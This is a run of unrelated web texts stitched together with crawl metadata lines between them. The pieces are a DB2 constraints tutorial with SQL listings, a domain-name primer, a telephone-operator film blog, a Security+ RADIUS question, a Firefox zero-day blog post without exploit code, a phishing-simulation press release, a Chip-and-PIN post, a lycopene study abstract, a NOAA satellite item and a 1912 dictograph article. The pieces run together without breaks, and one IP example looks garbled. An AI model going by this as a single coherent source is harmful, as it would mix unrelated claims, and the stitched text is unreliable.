| SYSCAT.COLUMNS | NULLS | Indicates whether a column is nullable (Y) or not nullable (N) | db2 select tabname, colname, nulls from syscat.columns where tabschema = 'DELSVT' and nulls = 'N' |
| SYSCAT.CONSTDEP | | Contains a row for each dependency of a constraint on some other object | db2 select constname, tabname, btype, bname from syscat.constdep |
| SYSCAT.INDEXES | | Contains a row for each index. | db2 select tabname, uniquerule, made_unique, system_required from syscat.indexes where tabschema = 'DELSVT' |
| SYSCAT.KEYCOLUSE | | Contains a row for each column that participates in a key defined by a unique, primary key, or foreign key constraint | db2 select constname, tabname, colname, colseq from syscat.keycoluse |
| SYSCAT.REFERENCES | | Contains a row for each referential constraint | db2 select constname, tabname, refkeyname, reftabname, colcount, deleterule, updaterule from syscat.references |
| SYSCAT.TABCONST | | Contains a row for each unique (U), primary key (P), foreign key (F), or table check (K) constraint | db2 select constname, tabname, type from syscat.tabconst |
| SYSCAT.TABLES | PARENTS | Number of parent tables of this table (the number of referential constraints in which this table is a dependent) | db2 "select tabname, parents from syscat.tables where parents > 0" |
| SYSCAT.TABLES | CHILDREN | Number of dependent tables of this table (the number of referential constraints in which this table is a parent) | db2 "select tabname, children from syscat.tables where children > 0" |
| SYSCAT.TABLES | SELFREFS | Number of self-referencing referential constraints for this table (the number of referential constraints in which this table is both a parent and a dependent) | db2 "select tabname, selfrefs from syscat.tables where selfrefs > 0" |
| SYSCAT.TABLES | KEYUNIQUE | Number of unique constraints (other than primary key) defined on this table | db2 "select tabname, keyunique from syscat.tables where keyunique > 0" |
| SYSCAT.TABLES | CHECKCOUNT | Number of check constraints defined on this table | db2 "select tabname, checkcount from syscat.tables where checkcount > 0" |
"Can't be nuthin'!" - The NOT NULL constraint
The NOT NULL constraint prevents null values from being added to a column. This ensures that the column has a meaningful value for each row in the table. For example, the definition of the EMPLOYEE table in the SAMPLE database includes LASTNAME VARCHAR(15) NOT NULL, which ensures that each row contains an employee's last name.
To determine whether a column is nullable, you can refer to the data definition language (DDL) for the table (which you can generate by using the db2look utility). You can also use the DB2 Control Center, as shown in Figure 3 and Figure 4.
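For example, the following db2look invocation extracts the DDL, including the NOT NULL attributes, for the EMPLOYEE table in the SAMPLE database (the exact output depends on your environment):

db2look -d sample -e -t employee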
Figure 3. View of tables in the Control Center
The DB2 Control Center lets you conveniently access database objects such as tables. Figure 3 shows the user tables in the SAMPLE database. They appear in the contents pane when Tables is selected in the object tree. If you select the STAFF table, you can open the Alter Table window to see the table definition, including the column attributes shown in Figure 4.
Figure 4. Alter Table screen in the Control Center
Or you can query the database catalog, as shown in Listing 1.
Listing 1. Querying the database catalog to determine which table columns are nullable
db2 select tabname, colname, nulls from syscat.columns where tabschema = 'DELSVT' and nulls = 'N'
"For singles only" - The unique constraint
The unique constraint prevents a value from appearing more than once within a particular column in a table. It also prevents a set of values from appearing more than once within a particular set of columns. Columns that are referenced in a unique constraint must be defined as NOT NULL. The unique constraint can be defined in the CREATE TABLE statement using the UNIQUE clause (Figure 1 and Figure 2), or in an ALTER TABLE statement, as shown in Listing 2.
Listing 2 shows how to create a unique constraint. The ORG_TEMP table is identical to the ORG table in the SAMPLE database, except that the LOCATION column in ORG_TEMP is defined as NOT NULL, so that a unique constraint can be defined on it.
Listing 2. Creating a unique constraint
db2 create table org_temp (
  deptnumb smallint not null,
  deptname varchar(14),
  manager smallint,
  division varchar(10),
  location varchar(13) not null)

db2 alter table org_temp add unique (location)

db2 insert into org_temp values (10, 'Head Office', 160, 'Corporate', 'New York')
DB20000I  The SQL command completed successfully.

db2 insert into org_temp values (15, 'New England', 50, 'Eastern', 'New York')
DB21034E  The command was processed as an SQL statement because it was not a
valid Command Line Processor command.  During SQL processing it returned:
SQL0803N  One or more values in the INSERT statement, UPDATE statement, or
foreign key update caused by a DELETE statement are not valid because the
primary key, unique constraint or unique index identified by "1" constrains
table "DELSVT.ORG_TEMP" from having duplicate values for the index key.
SQLSTATE=23505
The unique constraint helps to ensure data integrity by preventing unintentional duplication. In the example, the unique constraint prevents the insertion of a second record specifying New York as a branch location for the organization. The unique constraint is enforced through a unique index.
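If you want to confirm that the constraint was recorded, you can query the catalog. Assuming the ORG_TEMP example above, a query such as the following returns a row with type 'U' for the new unique constraint:

db2 select constname, tabname, type from syscat.tabconst where tabname = 'ORG_TEMP'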
"We're number one!" - The primary key constraint
The primary key constraint ensures that all values in the column or the set of columns that make up the primary key for a table are unique. The primary key is used to identify specific rows in the table. A table cannot have more than one primary key, but it can have several unique keys. The primary key constraint is a special case of the unique constraint, and it is enforced through a primary index.
Columns that are referenced in a primary key constraint must be defined as NOT NULL. The primary key constraint can be defined in the CREATE TABLE statement using the PRIMARY KEY clause (see Figure 1 and Figure 2), or in an ALTER TABLE statement as shown in Listing 3.
Listing 3 shows how to create a primary key constraint. The ID column in the STAFF table is not nullable, and it can have a primary key constraint defined on it.
Listing 3. Creating a primary key constraint
db2 alter table staff add primary key (id)
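A primary key can also be declared inline when a table is created. The following sketch uses a hypothetical STAFF_TEMP table whose columns are loosely modeled on STAFF; the names and data types are illustrative only:

db2 create table staff_temp ( id smallint not null primary key, name varchar(9), dept smallint, job char(5) )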
Alternatively, you can use the DB2 Control Center to define a primary key constraint on a table, as shown in Figure 5 and Figure 6. The Alter Table window provides a convenient way to define a primary key constraint on a table. Select the Keys tab, then click Add Primary.
Figure 5. The Alter Table window
The Define Primary Key window appears, as shown in Figure 6.
Figure 6. The Define Primary Key window
The Define Primary Key window enables you to select one or more columns from the Available column list. Click the > button to move names from the Available column list to the Selected column. Note that the selected columns must not be nullable.
"It's all relative" - The foreign key constraint
The foreign key constraint is sometimes referred to as the referential constraint. Referential integrity is defined as the state of a database in which all values of all foreign keys are valid. So what is a foreign key? A foreign key is a column or a set of columns in a table whose values must match at least one primary key or unique key value of a row in its parent table. What exactly does that mean? It's actually not as bad as it sounds. It simply means that if a column (C2) in a table (T2) has values that match values in a column (C1) of another table (T1), and C1 is the primary key column for T1, then C2 is a foreign key column in T2. The table containing the parent key (a primary key or a unique key) is called the parent table, and the table containing the foreign key is called the dependent table. Consider the following example.
The PROJECT table in the SAMPLE database has a column called RESPEMP. Values in this column represent the employee numbers of the employees who are responsible for each project listed in the table. RESPEMP is not nullable. Because this column corresponds to the EMPNO column in the EMPLOYEE table, and EMPNO is now the primary key for the EMPLOYEE table, RESPEMP can be defined as a foreign key in the PROJECT table, as shown in Listing 4. This ensures that future deletions from the EMPLOYEE table will not leave the PROJECT table with non-existent responsible employees.
Listing 4. Creating a foreign key constraint
db2 alter table project add foreign key (respemp) references employee on delete cascade
The REFERENCES clause points to the parent table for this referential constraint. The syntax for defining a foreign key constraint includes a rule-clause, which is where you can tell DB2 how you want update or delete operations handled from a referential integrity perspective (see Figure 1).
Insert operations are handled in a standard way over which you have no control. The insert rule of a referential constraint is that an insert value of the foreign key must match some value of the parent key of the parent table. This is consistent with what has already been said. If a new record is to be inserted into the PROJECT table, that record must contain a reference (through the parent-foreign key relationship) to an existing record in the EMPLOYEE table.
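As a sketch of the insert rule (column names follow the PROJECT table in the SAMPLE database; the values are made up, and the exact error message is omitted here), an insert that references a non-existent employee number is rejected by the database manager:

db2 insert into project (projno, projname, deptno, respemp) values ('ZZ9999', 'TEST PROJECT', 'E21', '999999')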
The update rule of a referential constraint is that an update value of the foreign key must match some value of the parent key of the parent table, and that all foreign key values must have matching parent key values when an update operation on the parent key completes. Again, all that this means is that there cannot be any orphans, and each dependent must have a parent.
The delete rule of a referential constraint applies when a row is deleted from a parent table, depending on what option was specified when the referential constraint was defined.
Table 2. Referential constraint options
| If this clause was specified when the referential constraint was created... | Then this is the result |
| --- | --- |
| RESTRICT or NO ACTION | No rows are deleted |
| SET NULL | Each nullable column of the foreign key is set to null |
| CASCADE | The delete operation is propagated to the dependents of the parent table. These dependents are said to be delete-connected to the parent table. |
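As an illustration of the SET NULL option (the dependent table and column here are hypothetical, and the foreign key column must be nullable for SET NULL to be allowed), a dependent ASSIGNMENTS table could be defined so that deleting an employee simply clears the reference:

db2 alter table assignments add foreign key (empno) references employee on delete set null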
Listing 5 shows some of these points.
Listing 5. Demonstrating the update rule and the delete rule in a foreign key constraint
db2 update employee set empno = '350' where empno = '000200'
DB20000I  The SQL command completed successfully.

db2 update employee set empno = '360' where empno = '000220'
DB21034E  The command was processed as an SQL statement because it was not a
valid Command Line Processor command.  During SQL processing it returned:
SQL0531N  The parent key in a parent row of relationship
"DELSVT.PROJECT.FK_PROJECT_2" cannot be updated.  SQLSTATE=23504

db2 "select respemp from project where respemp < '000050' order by respemp"

RESPEMP
-------
000010
000010
000020
000030
000030

  5 record(s) selected.

db2 delete from employee where empno = '000010'
DB21034E  The command was processed as an SQL statement because it was not a
valid Command Line Processor command.  During SQL processing it returned:
SQL0532N  A parent row cannot be deleted because the relationship
"DELSVT.PROJECT.FK_PROJECT_2" restricts the deletion.  SQLSTATE=23001

db2 "select empno from employee where empno < '000050' order by empno"

EMPNO
------
000010
000020
000030

  3 record(s) selected.
The EMPNO value of 000200 in the parent table (EMPLOYEE) can be changed, because there is no matching RESPEMP value of 000200 in the dependent table (PROJECT). However, the EMPNO value of 000220 has matching foreign key values in the PROJECT table, and therefore, it cannot be updated. The delete rule specifying the RESTRICT option ensures that no row containing the primary key value of 000010 can be deleted from the EMPLOYEE table while the delete-connected PROJECT table contains matching foreign key values.
"Check and check again" - The table check constraint
A table check constraint enforces defined restrictions on data being added to a table. For example, a table check constraint can ensure that the telephone extension for an employee is exactly four digits long whenever telephone extensions are added or updated in the EMPLOYEE table. Table check constraints can be defined in the CREATE TABLE statement using the CHECK clause (see Figure 1 and Figure 2), or in an ALTER TABLE statement, as shown in Listing 6.
Listing 6. Creating a table check constraint
db2 alter table employee add constraint phoneno_length check (length(rtrim(phoneno)) = 4)
The PHONENO_LENGTH constraint ensures that telephone extensions added to the EMPLOYEE table are exactly four digits long.
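With this constraint in place, an update or insert that supplies an extension of the wrong length is rejected with a check constraint violation (the exact message text is omitted here), for example:

db2 update employee set phoneno = '123' where empno = '000010'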
Alternatively, you can use the DB2 Control Center to define a table check constraint, as shown in Figure 7.
Figure 7. The Alter Table window provides a convenient way to define a table check constraint on a column
Click the Add button to define a new constraint, and the Add Check Constraint window opens. Or click the Change button to modify an existing constraint that you have selected from the list, as shown in Figure 8.
Figure 8. The Change Check Constraint window lets you modify an existing check condition
You cannot create a table check constraint if existing rows in the table contain values that violate the new constraint, as shown in Figure 9. You can successfully add or modify the constraint after the incompatible values are appropriately updated.
Figure 9. An error is returned if the new table check constraint is incompatible with existing values in the table
Table check constraints can be turned on or off using the SET INTEGRITY statement. This can be useful, for example, when optimizing performance during large data load operations against a table. Listing 7 shows a simple scenario that illustrates one possible approach to using the SET INTEGRITY statement. In this example, the telephone extension for employee 000100 is updated to a value of 123, after which integrity checking of the EMPLOYEE table is turned off. A check constraint requiring 4-digit telephone extension values is defined on the EMPLOYEE table. An exception table called EMPL_EXCEPT is created; the definition of this new table mirrors that of the EMPLOYEE table. Integrity checking is then turned on again, with rows in violation of the check constraint being written to the exception table. Queries against these tables confirm that the row in question now exists only in the exception table.
Listing 7. Using the SET INTEGRITY statement to defer constraints checking
db2 update employee set phoneno = '123' where empno = '000100'

db2 set integrity for employee off

db2 alter table employee add constraint phoneno_length check (length(rtrim(phoneno)) = 4)

db2 create table empl_except like employee

db2 set integrity for employee immediate checked for exception in employee use empl_except
SQL3602W  Check data processing found constraint violations and moved them to
exception tables.  SQLSTATE=01603

db2 select empno, lastname, workdept, phoneno from empl_except

EMPNO  LASTNAME        WORKDEPT PHONENO
------ --------------- -------- -------
000100 SPENSER         E21      123

  1 record(s) selected.
This article explored the various types of constraints supported by DB2 for Linux, UNIX, and Windows, including the NOT NULL constraint, the unique constraint, the primary key constraint, the foreign key (referential) constraint, and table check constraints. DB2 uses constraints to enforce business rules for data and to help preserve database integrity. You also learned how to use both the command line and the DB2 Control Center (and how to query the database catalog) to effectively manage constraints.
- DB2 for Linux, UNIX and Windows support portal
- IBM DB2 with BLU Acceleration for Linux, UNIX, and Windows download
- IBM DB2 Express-C download | <urn:uuid:1089fcd0-3041-4b00-9272-010adc461f09> | CC-MAIN-2017-09 | http://www.ibm.com/developerworks/data/library/techarticle/dm-0401melnyk/index.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00430-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.823915 | 4,422 | 2.546875 | 3 |
Domain Names Overview
Domain names are a hierarchical, administratively controlled namespace. Domain names provide an easy way for people to refer to a site.
Internet connections are uniquely identified with an Internet Protocol (IP) number. IP numbers (IP version 4) are a set of 4 numbers, each ranging from 0 to 255 (e.g., 220.127.116.11). IP numbers are difficult for people to remember, so many organizations will register a domain name which can be mapped to specific IP numbers. For more information about IP numbers see IANA (for example, see this allocation of IP numbers).
The domain name system began with several globally shared top-level domain names (.com, .net, .org) as well as country-specific codes (.jp, .de, .us, .uk). Over 1,000 new top-level domain names began coming online in 2013.
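As an illustration, the mapping from a domain name to an IP number can be seen with a standard lookup tool from the command line (the output varies by system and network):

nslookup www.example.com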
We often take for granted the technology we're currently using - computers, cell phones, tablets, etc. - and forget there was a time when these devices didn't exist.
Even making a telephone call was not as cut-and-dry as it is today - before computers took away most of these functions, people needed telephone operators to help connect calls and provide directory assistance.
The AT&T Archives channel on YouTube has posted a 17-minute video showcasing a film from 1969, entitled "Operator", which showcases the lives of telephone operators from the late '60s.
Several things fascinate me from this era. First, the mechanical nature of connecting calls back then. No computers or monitors are seen - and operators had to look up phone numbers via old-fashioned directories (when was the last time you used your phone book?). Second, I'm fascinated with the headsets these operators were using - many of today's Bluetooth headsets and voice headsets likely originated from these original designs. Finally, it's interesting to view customers' frustrations and attitudes with the operators (a funny moment is someone calling the operator to find out whether it was 6 a.m. or 6 p.m.). If you are interested at all about the history of technology, this video is worth 17 minutes of your time.
Questions derived from the CompTIA SY0-101 – Security+ Self Test Software Practice Test.
Objective: Communication Security
SubObjective: Recognize and understand the administration of the following types of remote access technologies: 802.1x, VPN, RADIUS, TACACS, L2TP/PPTP, SSH, IPSEC, Vulnerabilities
Item Number: SY0-22.214.171.124
Single Answer, Multiple Choice
Which technology provides centralized remote user authentication, authorization and accounting?
- RADIUS
- VPN
- DMZ
- Single sign-on
Remote Authentication Dial-In User Service (RADIUS) provides centralized remote user authentication, authorization, and accounting.
A virtual private network (VPN) is a technology that allows users to access private network resources over a public network, such as the Internet. Tunneling techniques are used to protect the internal resources.
A demilitarized zone (DMZ) is an isolated subnet on a corporate network that contains resources that are commonly accessed by public users, such as Internet users. The DM is created to isolate those resources to ensure that other resources that should remain private are not compromised. A DMZ is usually implemented with the use of firewalls.
Single sign-on is a feature whereby a user logs in once to access all network resources.
RADIUS is defined by RFC 2138 and 2139. A RADIUS server acts either as the authentication server or as a proxy client that forwards client requests to other authentication servers. The initial network access server, which is usually a VPN server or dial-up server, acts as a RADIUS client by forwarding the VPN or dial-up client’s request to the RADIUS server. RADIUS is the protocol that carries the information between the VPN or dial-up client, the RADIUS client, and the RADIUS server.
The centralized authentication, authorization, and accounting features of RADIUS allow central administration of all aspects of remote login. The accounting features allow administrators to track usage and network statistics by maintaining a central database.
Wikipedia.org, RADIUS, http://en.wikipedia.org/wiki/RADIUS | <urn:uuid:3b86ee25-6311-4c83-9dcd-70a76cdf499c> | CC-MAIN-2017-09 | http://certmag.com/communication-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00422-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.869996 | 453 | 2.90625 | 3 |
We knew about Java’s “Write once, run everywhere” mantra which very quickly turned into jokes like “Write once, pwn everywhere”. But with the latest Firefox zero-day, Oracle isn’t the only one that faces this problem.
Firefox, much like Java, can be found across various platforms and is quite a popular choice for people that run Linux. In fact, the Tor Browser itself uses Firefox.
Granted, the latest exploit against Mozilla's browser was intended for people running Windows.
Not too surprisingly, this prompted an almost immediate reaction from the Tor Project to advise people to stop using Microsoft’s Operating System.
While there is some truth in there, would it really be enough?
Case in point, this specific Firefox vulnerability is actually cross-platform, although from our tests, code execution only seems to happen on Windows.
Here’s a video showing the Firefox flaw on Apple’s Mac OS X. The browser crashes, and even if no actual code execution happened, the possibility is not out of this world.
While Mozilla has adopted a fast release cycle with automatic updates, people can be running older (but still supported) versions, as is the case with this Firefox 17 Extended Support Release (ESR).
Having to maintain multiple versions is probably one of software developers’ worst headaches. The reality is that many enterprises cannot readily upgrade that often due to many applications’ constraints to particular configurations.
This is definitely an issue as software vendors will naturally tend to focus their efforts on the latest version of the software they make, and that includes bug fixes and security improvements.
Jerome Segura (@jeromesegura) is Senior Security Researcher at Malwarebytes. | <urn:uuid:77f07f4a-0fa8-4b1a-a36f-65a804afccaf> | CC-MAIN-2017-09 | https://blog.malwarebytes.com/threat-analysis/2013/08/firefox-zero-day-a-quick-look-at-yet-another-cross-platform-exploit/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00598-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940093 | 363 | 2.5625 | 3 |
TraceSecurity launched the TraceSecurity Phishing Simulator, a secure, cloud-based solution that allows organizations to safely perform on-demand social engineering tests that mimic real-world attacks. Results are tracked to analyze employee actions and determine an organization’s social engineering risk.
TraceSecurity expert analysts have conducted hundreds of social engineering engagements, and its Phishing Simulator extends these services through an online tool that takes minutes to identify how vulnerable an organization’s employees are to social engineering attacks.
Many of the most dangerous threats to information security come from human error, and technological controls do little to prevent these careless mistakes. Performing a social engineering test helps organizations identify areas of weakness within an organization’s existing security awareness training initiatives, and allows them to determine the most effective resolutions.
With the Phishing Simulator, organizations can evaluate the effectiveness of existing information security policies, determine how well employees adhere to internal security procedures when presented with a phishing email, assess the level of security awareness among employees, and identify areas for remediation.
Many of the recent Advanced Persistent Threat (APT) exploits, such as the South Carolina Department of Revenue and New York Times breaches, have been suspected to have used phishing as their initial attack vectors to launch large scale attacks. It takes only a single employee to fall victim to these types of cyber threats to put an entire organization at risk.
“Deploying a simulated phishing attack against groups of employees not only tests their willingness to click on an unsolicited email, but also determines if they are apt to download potentially harmful code onto company resources,” said Jim Stickley, TraceSecurity CTO. “Malicious messages often contain malware that, when activated, can easily infect an entire network, which is why we developed Phishing Simulator. We believe every organization should, at a minimum, test a few employees and see how they do.”
Based on TraceSecurity’s research of email-based social engineering simulations, the company found that 30 percent of employees clicked on a link that could be a malicious website that may infect the computer with malware. In addition, the study found that 5 percent of employees manually installed malicious software on their computer that could compromise the network. Phishing simulations are a key risk assessment component to evaluate the awareness and effectiveness of an organization’s security policies.
For more information on self-assessment, read Learn by doing: Phishing and other online tests. | <urn:uuid:aa964a33-62bd-4a22-84fa-1443dcbff341> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2013/03/26/cloud-based-tool-simulates-social-engineering/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00598-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.934534 | 501 | 2.578125 | 3 |
In yesterday’s post we explained what Chip and PIN cards are and how they’re catching on worldwide. Today I’d like to go over the benefits of Chip and PIN so you can see why so many countries are adopting the technology. Chip and PIN cards provide benefits to cardholders, merchants and banks, including:
Safety - Chip and PIN cards are more secure than traditional magnetic stripe cards: it is exceptionally difficult to copy the information stored on the card, and the use of a unique PIN prevents a lost or stolen card from being used by someone else.
Faster Payments - with Chip and PIN, transactions are faster and there is no need to check a signature.
Fewer Disputes - Chip and PIN reduces fraudulent and disputed payments.
Customer Confidence - Chip cards are harder to counterfeit, and PIN numbers help prevent fraud involving lost and stolen cards.
Chip-enabled technology has the ability to eliminate the need for tethered devices to process payments in the field, making it a technology to keep an eye on for any business with a mobile workforce. | <urn:uuid:7ebee153-df01-4aaa-8b61-f3d0432b84cf> | CC-MAIN-2017-09 | http://blog.decisionpt.com/chip-and-pin-benefits | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00474-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.941542 | 220 | 2.65625 | 3 |
Simoes K.,Federal University of Goais |
Magosso R.F.,Centro Universitario Of Rio Preto Da University Unirp |
Lagoeiro C.G.,Centro Universitario Of Rio Preto Da University Unirp |
Castellan V.T.,Centro Universitario Of Rio Preto Da University Unirp |
And 6 more authors.
Revista Brasileira de Medicina do Esporte | Year: 2014
Introduction: Free radicals produced during exercise may exceed the antioxidant defense system, causing oxidative damage to specific biomolecules. The lesions caused by free radicals in cells can be prevented or reduced by natural antioxidants, which are found in many foods. Lycopene is one of the most potent carotenoids with antioxidant properties, and it is used to prevent carcinogenesis and atherogenesis, as it protects molecules such as lipids, low-density lipoproteins (LDL), proteins and DNA. Objective: To investigate the role of lycopene as a potential protector of cardiac and skeletal muscle fibers against oxidative stress during strenuous exercise, which would cause morphological changes in these tissues. Methods: The experiments consisted of 32 adult male rats divided into four groups: Two control groups and two trained groups with and without lycopene supplementation (6 mg per animal). The animals of the trained groups were subjected to 42 swimming sessions over a nine-week period, involving daily swimming sessions, five days a week, with overload produced by increasing the training time. The morphological analysis was performed using histological slides of cardiac and skeletal muscle tissues. Results: Modifications were observed in cardiac and skeletal muscle tissue in the trained group that did not receive lycopene supplementation, while the trained group supplemented with lycopene showed muscle tissue with a normal morphological appearance. The tissues of both supplemented and non supplemented sedentary control groups showed no change in their histological characteristics. Conclusion: It can be stated that lycopene exerted a protective effect on cardiac and skeletal muscles against oxidative stress induced by strenuous exercise, besides promoting cardiac neovascularization, and can be used efficiently by athletes and physically active individuals. Source | <urn:uuid:fe5b9b04-7e24-494b-ae2e-d2550c6d7129> | CC-MAIN-2017-09 | https://www.linknovate.com/affiliation/centro-universitario-of-rio-preto-da-university-unirp-2399013/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171781.5/warc/CC-MAIN-20170219104611-00650-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.931747 | 447 | 2.78125 | 3 |
A Primer on Sidetone
Digital telephones include electronic circuitry that provides an effect called “sidetone”, which allows a caller to be able to hear their own voice through the telephone earpiece. An example of this effect can be heard by blowing into the mouthpiece of a telephone handset and hearing the sound transmitted through the earpiece.
Sidetone is beneficial as it provides audible feedback to the caller that the telephone is working. In loud environments, however, sidetone can become excessive as the handset microphone picks up background noise and transmits it through to the earpiece. Not only does this make it more difficult to hear the remote party, it also makes it unpleasant to use the telephone.
By operating with lowered audio transmit levels, the Algo 1075 Noisy Location Handset reduces the pickup of background noise and, in turn, sidetone. This allows the near-end caller to hear the remote caller more clearly. It also reduces the background noise transmitted to the remote caller making it easier for them to hear what is said. | <urn:uuid:94b26313-f594-41ab-99f1-57957162ab3d> | CC-MAIN-2017-09 | http://www.algosolutions.com/products/specialty-handsets/1075-noisy-location-handsets/reducing-sidetone.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00646-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950337 | 219 | 2.890625 | 3 |
Satellite predicts eruption
- By Frank Konkel
- Aug 23, 2013
Mount Sakurajima, photographed by NOAA's Suomi NPP satellite. (NOAA image)
One of the National Oceanic and Atmospheric Administration's satellites detected the Aug. 18 eruption of Japan's Mount Sakurajima 14 hours before it occurred, according to a statement from the weather agency.
The satellite – the Suomi National Polar-orbiting Partnership (NPP) – pinpointed heat from the volcano while on one of its 14 daily orbits around the Earth using its Visible Infrared Imaging Radiometer Suite (VIIRS) sensor. Half a day after the satellite detected the thermal buildup, the volcano erupted, sending an ash plume three miles into the air.
Technically speaking, Suomi NPP is the first in the government's $13 billion next-generation Joint Polar Satellite System (JPSS) fleet. It's really just a converted demonstration satellite launched in 2011 in hopes of mitigating a gap in polar-orbiting satellite coverage.
The Visible Infrared Imaging Radiometer Suite sensor that allowed the satellite to predict the volcanic eruption.
While its sibling satellites – the first of which will not be operational until 2017 – will have far more powerful technical capabilities and instrumentation, detecting a volcanic eruption before it happens is proof that Suomi NPP has some cool features of its own.
"VIIRS continues to show new and remarkable capabilities that will enable scientists to better understand the Earth – from the land to the highest levels of the atmosphere," said Dr. Chris Elvidge, head of the Earth Observation Group of NOAA's National Geophysical Data Center in Boulder, Colo.
VIIRS will be included in the JPSS-1 and JPSS-2, which are expected to be operational in 2017 and 2022, respectively. JPSS represents the next generation of polar-orbiting satellites that will have an increased role in weather prediction.
Note: This story was updated on Aug. 26 to correct projected date of operation for JPSS-2.
Frank Konkel is a former staff writer for FCW. | <urn:uuid:cdad9a3c-2908-442c-bf85-1a67c3fd3859> | CC-MAIN-2017-09 | https://fcw.com/articles/2013/08/23/noaa-satellite-volcano.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00342-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.905559 | 440 | 3.125 | 3 |
The leader in Eavesdropping Detection
and Counterespionage Consulting services
for business & government, since 1978.
March 30, 1912
Detective Burns Listened
to Dynamiter Plots
Instruments That Can be Used for Eavesdropping
or for Business Purposes
It has been the impression of the public that the dictograph is a very complicated mechanism for automatically and unerringly recording the conversation carried on near it. In general, the mechanism employed is quite simple and easily understood. In fact there is no new principle involved. The invention is an adaptation of well-known apparatus to a peculiar purpose or situation.
The instruments are of three general types. First is the type shown in Fig. 1, sometimes modified as shown in Fig. 2. This is the type of apparatus referred to by Detective Burns in his dynamiting cases. It is really nothing more than a simple telephone circuit arranged to convey sounds from the talking station shown on the left to the listening or recording station on the right. Sometimes the transmitter is mounted in an innocent-looking square or triangular box, divided into two compartments. Within one compartment is room enough for small size dry batteries and for storing the receiver when the apparatus is not in use or is being carried about from place to place; within the other is located the transmitter element.
One wall of this second compartment of the box is, in reality, a thin diaphragm, with which is connected the microphone or resistance-varying element, usually a sensitive granular carbon transmitter button or cup. The size of the box is quite immaterial, but it is evident that the larger the diaphragm, the greater is the area of the sound-wave acting upon the transmitter element, and hence the better and stronger the reproduction of the sound at the receiving end of the line.
This is the type of instrument said to have been used by the famous Detective Burns and his associates in the MacNamara case and the so-called Lorimer-Hines bribery case. In each case the method of operating the device was somewhat as follows: Burns or any of his associated preventives “rigged up” a few rooms in a hotel. Appointments were made with suspects and accomplices. In one room in which the conversation or consultation was held, there was located the little transmitters disposed in a convenient but inconspicuous position; in the adjoining room the receiver of the instrument was placed, and an expert stenographer with the receiver to his ear took down the conversation carried on by the preventive and the suspect in the other room. Thus, it is declared, very valuable evidence was gathered. Indeed the success of the case is said to have depended upon the use of this ingenious device.
The use of this form of apparatus with slight modification has been applied to large auditoriums and churches. Instead of using a single transmitter and a single receiver, as shown in the figure, a number of transmitters
placed at various points about the stage or pulpit are arranged to gather the sounds and transmit to persons at remote parts of the hall the voices of the speakers or the strains of the orchestra. As many receivers as may be required are connected into the circuit to reproduce the sound at the remote points.
A somewhat similar apparatus is employed for announcing trains in the waiting rooms of large railway stations. The train announcer speaks into a transmitter and the sound waves are electrically reproduced by means of loud-speaking telephone receivers placed at various points about the great hall or waiting room. It is remarkable how clearly the voice is transmitted, for the announcement can be clearly and distinctly heard in every part of the immense room reverberating sonorously amid the huge marble pillars.
In a modified form, as shown in Fig. 2, the apparatus is employed in large business offices between a manager’s desk or office in one room and a stenographer’s desk in another room for the purpose of expeditiously dictating letters and transmitting intelligence of any kind. In this case the apparatus is really nothing more than an intercommunicating telephone system, for speech can be transmitted in both directions. Various switches are employed for connecting the apparatus of any one of a number of stenographers’ desks with the manager’s instrument.
The second broad class is shown diagrammatically in Fig. 3. This is an arrangement combining the use of the telephone and phonograph. This type of instrument is often known as the “telephonograph,” and in practice it assumes a number of different forms. In each case the principle is the same as that outlined in the figure. As soon as the telephone and the phonograph were invented the combined use of the two instruments suggested itself to a number of inventors. As early as February 1889, there were public exhibitions of such use of the two instruments in combination.
In a lecture before the Franklin Institute at Philadelphia, Mr. William J. Hammer performed the following experiment: A phonograph at New York was set to talk into a carbon transmitter, sending current waves over a telephone line to Philadelphia, a distance of 103 miles to the audience at the Franklin Institute. At that station a loud-speaking receiver talked into another phonograph and then in turn delivered to the amazed audience the tones of the original speaker in New York City.
No great practical use has been found for this combined instrument due to the great difficulty of keeping a suitable surface constantly in motion ready to record the sound waves. Furthermore much of the apparatus is too large and cumbersome to be conveniently portable, due largely to the size and weight of the motor mechanism for driving the cylinders.
It was early proposed to apply this instrument to the ordinary telephone to keep a record of the conversations passing over the line. This was to be especially useful in keeping a record of these conversations for subsequent use in legal controversies. It would be too easy, however, to manufacture such a record. At present an application of such device is found in some systems of telephone exchanges.
A continuously operating phonograph is used as a “busy-test.” If the subscriber calls a busy line he is automatically connected at the central station with this phonograph which continuously repeats the well-known ditty, “the line is busy, please call again.”
Another use of this type of instrument has been made in certain automatic fire-alarm installations. In this case thermostats are arranged to close a circuit at a predetermined temperature. This circuit controls the operation of a phonograph device, connecting it with the nearest telephone line. Arranged on the cylinder of this instrument is the message to be transmitted to the central station or to the nearest fire station. Such record may contain suitable words as “there is a fire at No. 99 Park Row.” The instrument is arranged first to signal central and then to repeat this message a number of times. “Central,” upon receiving such a message, connects the line directly with fire headquarters and thus, automatically an alarm is sent in almost instantaneously. With this arrangement, it is evident that a subscriber would be apprised of the fire call if he were using the telephone line and would immediately stop his conversation and hang up his receiver to allow the call to continue to “central.”
